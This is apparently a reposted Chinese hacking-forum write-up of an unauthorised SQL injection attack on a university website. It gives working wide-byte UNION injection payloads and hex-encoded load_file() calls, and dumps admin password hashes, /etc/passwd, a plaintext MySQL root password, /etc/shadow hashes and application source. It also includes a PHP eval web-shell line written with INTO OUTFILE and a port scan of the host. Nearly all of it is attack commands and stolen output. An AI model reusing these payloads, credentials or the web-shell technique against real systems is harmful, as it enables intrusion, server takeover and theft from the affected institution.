站点:http://xxxx.xxxx.edu.cn
注入点:http://xxxxx.xxxxx.edu.cn/news_view.php?id=94
提交 %bf' 出现错误，由此可见存在宽字节注入（后面读出的 db_config.php 中 $mydbcharset 为 GBK，与此相符）
接着 %bf%27 and 1=1 %23 正确返回
%bf%27 order by 10 %23
返回正确，判断当前页面字段数为10
接着渗透
%bf%27%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10%23
返回正确 返回3 9
用database() 爆出 数据库名字为 international
直接爆表
先用dual表判断了一下 information_schema.tables 是否可用
判断结果 成功返回3 9，这样判断 information_schema.tables 可用。
接着用 table_name 替代3 同时在后边加上查询条件 where TABLE_NAME=
0x696E7465726E6174696F6E616C international的十六进制
返回表名 i_admin 初步判断为 管理员账号所在的表
通过limit 条件
接着爆表
i_admin
i_application_configs
i_application_information_step1
i_application_information_step2
i_application_information_step3
i_application_userbasic
i_count
i_department
。。。下面就不爆了
接着爆 i_admin 的 字段
1,2,3,4,5,6,7,8,9,10 from information_schema.COLUMNS
正确返回数字
i_admin 十六进制0x695F61646D696E
加上 where 条件 后 返回 字段 uid
接着加limit条件 爆出所有的字段
uid
m_id
username
password
name
state
至此 i_admin 的字段名全部爆出。
接着爆 username 和password 这两个
问题出现了 换成 username 和password 返回错误??而uid和state没错误
Hex编码解决问题
Hex(username)
6A73 js
Hex(password)
63316661363261616xxxxxxxxxxxx64323062383732666663366531303936
c1fa62aaeb049f62d20b872ffc6e1096
rxxxxxxx7
rxxxxxxx7
61646D696E admin
65313832613535xxxxxxxxxxxx36662626138316166636564343631
jxxxxxxxx2
7A687A
30343938303530xxxxxxxxxxxxxx466353730346337643336656438
jsxxxxxxxxxxx2
到此拿下后台密码
————————————————-
换一种思路
因为 是 root权限 ..到这了。。
load_file(0x2F6574632F706173737764) //读/etc/passwd文件
返回
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
haldaemon:x:68:68:HALdaemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
mysql:x:500:500::/home/mysql:/bin/bash
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
zf_job:x:501:501::/opt/www_application/job:/bin/bash
angang523409:x:502:0::/home/angang523409:/bin/bash
syyy:x:503:503::/opt/www_application/syyy:/bin/bash
网站所在目录（从上面 /etc/passwd 中 zf_job、syyy 等账号的家目录可以推断，应用应位于 /opt/www_application 下）
读:/opt/www_application/xxxxx/news_view.php
0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F6E6577735F766965772E706870
replace(load_file(0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F6E6577735F766965772E706870),char(60),char(32))
?php include_once(‘global.php’); if(isset($_GET[id])){$sql=”update i_newsbase set hits=hits+1 where id=”.$_GET[id];mysql_query($sql); $query_view = mysql_query(“SELECT * FROM `i_newsbase`WHERE `id`=’$_GET[id]’;”); $row_view = mysql_fetch_array($query_view); }?> !DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN””http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”> htmlxmlns=”http://www.w3.org/1999/xhtml”> head> metahttp-equiv=”Content-Type” content=”text/html; charset=GB2312″/> title> ?=$row_view[title]?> – ?=$row_arr[websitename]?> /title> ?php include_once(‘header.php’);?> !–contene–> div id=”contene_”> divid=”box_l”> div id=”box_r”> divid=”l_box”> div> div>h3>Focus News /h3> /div> ?php $query_news = mysql_query(“SELECT *FROM `i_newsbase` order by `date_time` desc limit 12 “); while($row_news =mysql_fetch_array($query_news)){ ?> p> span> atitle=” ?=$row_news[title]?>” href=”news_view.php?id=?=$row_news[id]?>”> ?php if(strlen($row_news[title])>40) { echo$db->titlesubstr($row_news[title],0,40).”…” ;} else echo$row_news[title]; ?> /a> /span> /p> ?php } ?> /p> /div>/div> /div> /div> div id=”box_l_”> divid=”box_r_”> div id=”r_box”> div>h3> a href=”index.php”>Home /a> span>» /span> a href=”news_list.php”>News /a>/h3> /div> div> div>?php $query_all = mysql_query(“SELECT * FROM `i_newsbase` as`a`,`i_newscontent` as `b` where `a`.`id`=`b`.`nid` and `a`.`id`=’$_GET[id]’limit 1;”); $row_all = mysql_fetch_array($query_all); ?> divalign=”center” > ?=$row_all[title]?> /div> p> /p> pclass=”font” align=”center”>Date:?=date(“Y-m-d”,$row_all[date_time])?> /p> /div> ?=$row_all[content]?>/div> div> /div> /div> /div> /div>div> /div> div id=”ad”> /div>/div> ?php include_once(‘footer.php’); ?>
接着读取
Global.php
/opt/www_application/xxxxx/global.php
0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F676C6F62616C2E706870
replace(load_file(0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F676C6F62616C2E706870),char(60),char(32))
返回
?php include_once (‘./configs/config.php’);include_once (‘./common/mysql.class.php’); include_once(‘./common/action.class.php’); include_once (‘./common/page.class.php’); $db =new action($mydbhost, $mydbuser, $mydbpw, $mydbname, ALL_PS, $mydbcharset);$query_config=$db->query(“SELECT * FROM `i_config`”); while($row_config=$db->fetch_array($query_config)){$row_arr[$row_config[name]]=$row_config[values];$row_eng[$row_config[name]]=$row_config[xxxxx_values]; } ?>
读 ./configs/config.php
/opt/www_application/xxxxx/configs/config.php
/opt/www_application/configs/config.php
0x2F6F70742F7777775F6170706C69636174696F6E2F636F6E666967732F636F6E6669672E706870
replace(load_file(0x2F6F70742F7777775F6170706C69636174696F6E2F636F6E666967732F636F6E6669672E706870),char(60),char(32))
返回空。。。。。。。。无此文件
/opt/www_application/xxxxx/configs/config.php
0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F636F6E666967732F636F6E6669672E706870
replace(load_file(0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F636F6E666967732F636F6E6669672E706870),char(60),char(32))
返回:
?php include_once(‘db_config.php’);include_once(‘variable_config.php’);/****************************************************************************** 上传图片的参数说明:$max_file_size : 上传文件大小限制, 单位BYTE $destination_folder : 上传文件路径 $watermark : 是否附加水印(1为加水印,其他为不加水印); 使用说明: 1. 将PHP.INI文件里面的”extension=php_gd2.dll”一行前面的;号去掉,因为我们要用到GD库; 2. 将extension_dir =改为你的php_gd2.dll所在目录; ******************************************************************************/// 上传文件类型列表$uptypes=array( ‘image/jpg’, ‘image/jpeg’, ‘image/png’, ‘image/pjpeg’,’image/gif’, ‘image/bmp’, ‘image/x-png’ ); $max_file_size=2000000; //上传文件大小限制, 单位BYTE$destination_folder=”uploading/”; //上传文件路径 $watermark=1; //是否附加水印(1为加水印,其他为不加水印); $watertype=1; //水印类型(1为文字,2为图片)$waterposition=1; //水印位置(1为左下角,2为右下角,3为左上角,4为右上角,5为居中); $waterstring=”TY”;//水印字符串$waterimg=”xplore.gif”; //水印图片 $imgpreview=1; //是否生成预览图(1为生成,其他为不生成); $imgpreviewsize=1/1; //缩略图比例 ?>
/opt/www_application/xxxxx/configs/db_config.php
0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F636F6E666967732F64625F636F6E6669672E706870
replace(load_file(0x2F6F70742F7777775F6170706C69636174696F6E2F656E676C6973682F636F6E666967732F64625F636F6E6669672E706870),char(60),char(32))
返回
x
?php // 该文件为存储用户数据库的变量的文件 $mydbhost = “localhost”; $mydbuser = “root”;$mydbpw = “xyw1120”; $mydbname = “international”;$mydbcharset = “GBK”; ?>
目的达到：mysql 账号 root，密码 xyw1120。网站直接以 MySQL root 账号连接数据库，前面 load_file() 能读取系统文件，也正是这一过高的数据库权限造成的。
/opt/www_application/xxxxx/1.php
select “dddd” into outfile’/var/www/data/suddytest.php’
select ‘<?php eval($_POST[cmd])?>’into outfile ‘D:/PHPnow-1.5.4/htdocs/index2.php’
select ‘<?php echo “HelloWorld”; ?>’ into outfile ‘/opt/www_application/xxxxx/index2.php’
757365726E616D65
/etc/vpn/server.conf
0x2F6574632F76706E2F736572766572 E636F6E66
replace(load_file(0x2F6574632F76706E2F736572766572E636F6E66),char(60),char(32))
replace(load_file(0x2F6574632F76706E2F736572766572E636F6E66),char(60),char(32))
扫一下端口
80 Open
111 Open
1723 Open
3306 Open
1723 vpn端口,从这个角度出发。。。。。接着渗透
读 /etc/shadow
0x2F6574632F736861646F77
replace(load_file(0x2F6574632F736861646F77),char(60),char(32))
内容如下
root:$1$PqDYAJMy$nrwxVO7zGgQsd.cNfzOSp0:14731:0:99999:7:::bin:$1$v/3WmY2W$jUw9sPr2kDkW0BvNB63gO.:14847:0:99999:7:::daemon:*:14215:0:99999:7::: adm:*:14215:0:99999:7::: lp:*:14215:0:99999:7:::sync:*:14215:0:99999:7::: shutdown:*:14215:0:99999:7::: halt:*:14215:0:99999:7:::mail:*:14215:0:99999:7::: news:*:14215:0:99999:7::: uucp:*:14215:0:99999:7:::operator:*:14215:0:99999:7::: games:*:14215:0:99999:7:::gopher:*:14215:0:99999:7::: ftp:*:14215:0:99999:7:::nobody:*:14215:0:99999:7::: rpm:!!:14215:0:99999:7::: dbus:!!:14215:0:99999:7:::avahi:!!:14215:0:99999:7::: mailnull:!!:14215:0:99999:7:::smmsp:!!:14215:0:99999:7::: nscd:!!:14215:0:99999:7:::vcsa:!!:14215:0:99999:7::: rpc:!!:14215:0:99999:7:::rpcuser:!!:14215:0:99999:7::: nfsnobody:!!:14215:0:99999:7::: sshd:!!:14215:0:99999:7:::pcap:!!:14215:0:99999:7::: haldaemon:!!:14215:0:99999:7:::xfs:!!:14215:0:99999:7::: mysql:!!:14218:0:99999:7::: apache:!!:14221::::::ntp:!!:14545:::::: zf_job:$1$.EE7dw2F$/G1ObIx0vfXZsZ/DBid/z0:14728:0:99999:7:::angang523409:$1$vA29oCDp$FJo378ewOAgvfu0c7tjwD0:14747:0:99999:7:::syyy:$1$38W/v5/Z$L5K9oIAdaFHH8js6fODFL/:15265:0:99999:7:::
转自:90sec